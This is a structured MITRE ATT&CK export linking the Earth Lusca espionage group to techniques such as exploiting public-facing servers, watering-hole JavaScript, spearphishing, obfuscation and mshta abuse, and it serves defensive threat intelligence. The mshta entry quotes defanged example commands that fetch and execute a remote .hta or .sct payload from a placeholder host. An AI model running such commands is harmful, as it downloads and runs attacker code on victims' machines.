external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 2.1.0
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 1.0
technique_ref : attack-pattern--3f886f2a-874f-4333-b794-aa6075009b1c
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has compromised victims by directly exploiting vulnerabilities of public-facing servers, including those associated with Microsoft Exchange and Oracle GlassFish.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--b8012238-cfd9-4c5b-8759-8d86f0d6f933
revoked : False
technique : Exploit Public-Facing Application
technique_description : Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network. The weakness in the system can be a software bug, a temporary glitch, or a misconfiguration.

Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may also involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211). 

If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs, exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.

Adversaries may also exploit edge network infrastructure and related appliances, specifically targeting devices that do not support robust host-based defenses.(Citation: Mandiant Fortinet Zero Day)(Citation: Wired Russia Cyberwar)

For websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.(Citation: OWASP Top 10)(Citation: CWE top 25)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='initial-access')]
technique_id : T1190
matrix : mitre-attack
platform : ['Windows', 'IaaS', 'Network', 'Linux', 'macOS', 'Containers']
data_sources : ['Network Traffic: Network Traffic Content', 'Application Log: Application Log Content']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2022-07-01T20:12:30.184Z
modified : 2022-10-17T19:51:56.531Z
name : Earth Lusca
description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)

[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)
aliases : ['Earth Lusca', 'TAG-22']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 2.1.0
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 1.0
technique_ref : attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has manipulated legitimate websites to inject malicious JavaScript code as part of their watering hole operations.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--4504384f-f832-4ec2-87b0-b8dfc2208083
revoked : False
technique : JavaScript
technique_description : Adversaries may abuse various implementations of JavaScript for execution. JavaScript (JS) is a platform-independent scripting language (compiled just-in-time at runtime) commonly associated with scripts in webpages, though JS can be executed in runtime environments outside the browser.(Citation: NodeJS)

JScript is the Microsoft implementation of the same scripting standard. JScript is interpreted via the Windows Script engine and thus integrated with many components of Windows such as the [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and Internet Explorer HTML Application (HTA) pages.(Citation: JScrip May 2018)(Citation: Microsoft JScript 2007)(Citation: Microsoft Windows Scripts)

JavaScript for Automation (JXA) is a macOS scripting language based on JavaScript, included as part of Apple’s Open Scripting Architecture (OSA), that was introduced in OSX 10.10. Apple’s OSA provides scripting capabilities to control applications, interface with the operating system, and bridge access into the rest of Apple’s internal APIs. As of OSX 10.10, OSA only supports two languages, JXA and [AppleScript](https://attack.mitre.org/techniques/T1059/002). Scripts can be executed via the command line utility <code>osascript</code>, they can be compiled into applications or script files via <code>osacompile</code>, and they can be compiled and executed in memory of other programs by leveraging the OSAKit Framework.(Citation: Apple About Mac Scripting 2016)(Citation: SpecterOps JXA 2020)(Citation: SentinelOne macOS Red Team)(Citation: Red Canary Silver Sparrow Feb2021)(Citation: MDSec macOS JXA and VSCode)

Adversaries may abuse various implementations of JavaScript to execute various behaviors. Common uses include hosting malicious scripts on websites as part of a [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) or downloading and executing these script files as secondary payloads. Since these payloads are text-based, it is also very common for adversaries to obfuscate their content as part of [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027).
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='execution')]
technique_id : T1059.007
matrix : mitre-attack
platform : ['Windows', 'macOS', 'Linux']
data_sources : ['Module: Module Load', 'Process: Process Creation', 'Script: Script Execution', 'Command: Command Execution']
permissions_required : ['User', 'Administrator', 'SYSTEM']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2022-07-01T20:12:30.184Z
modified : 2022-10-17T19:51:56.531Z
name : Earth Lusca
description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)

[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)
aliases : ['Earth Lusca', 'TAG-22']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 2.1.0
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 1.0
technique_ref : attack-pattern--2b742742-28c3-4e1b-bab7-8350d6300fa7
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has sent spearphishing emails to potential targets that contained a malicious link.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--cff64310-fe63-44ad-9791-d1b4b50f0229
revoked : False
technique : Spearphishing Link
technique_description : Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.

All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this case, the malicious emails contain links. Generally, the links will be accompanied by social engineering text and require the user to actively click or copy and paste a URL into a browser, leveraging [User Execution](https://attack.mitre.org/techniques/T1204). The visited website may compromise the web browser using an exploit, or the user will be prompted to download applications, documents, zip files, or even executables depending on the pretext for the email in the first place.

Adversaries may also include links that are intended to interact directly with an email reader, including embedded images intended to exploit the end system directly. Additionally, adversaries may use seemingly benign links that abuse special characters to mimic legitimate websites (known as an "IDN homograph attack").(Citation: CISA IDN ST05-016) URLs may also be obfuscated by taking advantage of quirks in the URL schema, such as the acceptance of integer- or hexadecimal-based hostname formats and the automatic discarding of text before an “@” symbol: for example, `hxxp://google.com@1157586937`.(Citation: Mandiant URL Obfuscation 2023)

Adversaries may also utilize links to perform consent phishing, typically with OAuth 2.0 request URLs that when accepted by the user provide permissions/access for malicious applications, allowing adversaries to  [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s.(Citation: Trend Micro Pawn Storm OAuth 2017) These stolen access tokens allow the adversary to perform various actions on behalf of the user via API calls. (Citation: Microsoft OAuth 2.0 Consent Phishing 2021)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='initial-access')]
technique_id : T1566.002
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows', 'Office 365', 'SaaS', 'Google Workspace']
data_sources : ['Network Traffic: Network Traffic Flow', 'Application Log: Application Log Content', 'Network Traffic: Network Traffic Content']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2022-07-01T20:12:30.184Z
modified : 2022-10-17T19:51:56.531Z
name : Earth Lusca
description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)

[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)
aliases : ['Earth Lusca', 'TAG-22']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 2.1.0
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 1.0
technique_ref : attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) used Base64 to encode strings.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--c74dfd33-e17a-4fc7-b2bd-154499fc3ac2
revoked : False
technique : Obfuscated Files or Information
technique_description : Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses. 

Payloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) for [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also use compressed or archived scripts, such as JavaScript. 

Portions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery. (Citation: Linux/Cdorked.A We Live Security Analysis) Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled. (Citation: Carbon Black Obfuscation Sept 2016)

Adversaries may also abuse [Command Obfuscation](https://attack.mitre.org/techniques/T1027/010) to obscure commands executed from payloads or directly via [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and application control mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation July 2017)(Citation: PaloAlto EncodedCommand March 2017) 
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')]
technique_id : T1027
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows']
data_sources : ['WMI: WMI Creation', 'Script: Script Execution', 'File: File Creation', 'Module: Module Load', 'Command: Command Execution', 'File: File Metadata', 'Process: OS API Execution', 'Windows Registry: Windows Registry Key Creation', 'Process: Process Creation']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2022-07-01T20:12:30.184Z
modified : 2022-10-17T19:51:56.531Z
name : Earth Lusca
description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)

[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)
aliases : ['Earth Lusca', 'TAG-22']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 2.1.0
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 1.0
technique_ref : attack-pattern--5502c4e9-24ef-4d5f-8ee9-9e906c2f82c4
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has scanned for vulnerabilities in the public-facing servers of their targets.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--e0e8cd30-04d6-457c-b4c1-34145f182dad
revoked : False
technique : Vulnerability Scanning
technique_description : Adversaries may scan victims for vulnerabilities that can be used during targeting. Vulnerability scans typically check if the configuration of a target host/application (ex: software and version) potentially aligns with the target of a specific exploit the adversary may seek to use.

These scans may also include more broad attempts to [Gather Victim Host Information](https://attack.mitre.org/techniques/T1592) that can be used to identify more commonly known, exploitable vulnerabilities. Vulnerability scans typically harvest running software and version numbers via server banners, listening ports, or other network artifacts.(Citation: OWASP Vuln Scanning) Information from these scans may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)).
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='reconnaissance')]
technique_id : T1595.002
matrix : mitre-attack
platform : ['PRE']
data_sources : ['Network Traffic: Network Traffic Content', 'Network Traffic: Network Traffic Flow']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2022-07-01T20:12:30.184Z
modified : 2022-10-17T19:51:56.531Z
name : Earth Lusca
description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)

[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)
aliases : ['Earth Lusca', 'TAG-22']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 2.1.0
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 1.0
technique_ref : attack-pattern--840a987a-99bd-4a80-a5c9-0cb2baa6cade
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has used `mshta.exe` to load an HTA script within a malicious .LNK file.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--a3627d9d-1c78-4b10-8b1c-3183a939862b
revoked : False
technique : Mshta
technique_description : Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code (Citation: Cylance Dust Storm) (Citation: Red Canary HTA Abuse Part Deux) (Citation: FireEye Attacks Leveraging HTA) (Citation: Airbus Security Kovter Analysis) (Citation: FireEye FIN7 April 2017) 

Mshta.exe is a utility that executes Microsoft HTML Applications (HTA) files. (Citation: Wikipedia HTML Application) HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. (Citation: MSDN HTML Applications)

Files may be executed by mshta.exe through an inline script: <code>mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))</code>

They may also be executed directly from URLs: <code>mshta http[:]//webserver/payload[.]hta</code>

Mshta.exe can be used to bypass application control solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings. (Citation: LOLBAS Mshta)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')]
technique_id : T1218.005
matrix : mitre-attack
platform : ['Windows']
data_sources : ['Process: Process Creation', 'File: File Creation', 'Command: Command Execution', 'Network Traffic: Network Connection Creation']
permissions_required : ['User']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2022-07-01T20:12:30.184Z
modified : 2022-10-17T19:51:56.531Z
name : Earth Lusca
description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)

[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)
aliases : ['Earth Lusca', 'TAG-22']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 2.1.0
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 1.0
technique_ref : attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has used [certutil](https://attack.mitre.org/software/S0160) to decode a string into a cabinet file.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--52a5b303-b759-424e-86b8-5c855976e5ea
revoked : False
technique : Deobfuscate/Decode Files or Information
technique_description : Adversaries may use [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.

One such example is the use of [certutil](https://attack.mitre.org/software/S0160) to decode a remote access tool portable executable file that has been hidden inside a certificate file.(Citation: Malwarebytes Targeted Attack against Saudi Arabia) Another example is using the Windows <code>copy /b</code> command to reassemble binary fragments into a malicious payload.(Citation: Carbon Black Obfuscation Sept 2016)

Sometimes a user's action may be required to open it for deobfuscation or decryption as part of [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')]
technique_id : T1140
matrix : mitre-attack
platform : ['Windows', 'Linux', 'macOS']
data_sources : ['Process: Process Creation', 'Script: Script Execution', 'File: File Modification']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2022-07-01T20:12:30.184Z
modified : 2022-10-17T19:51:56.531Z
name : Earth Lusca
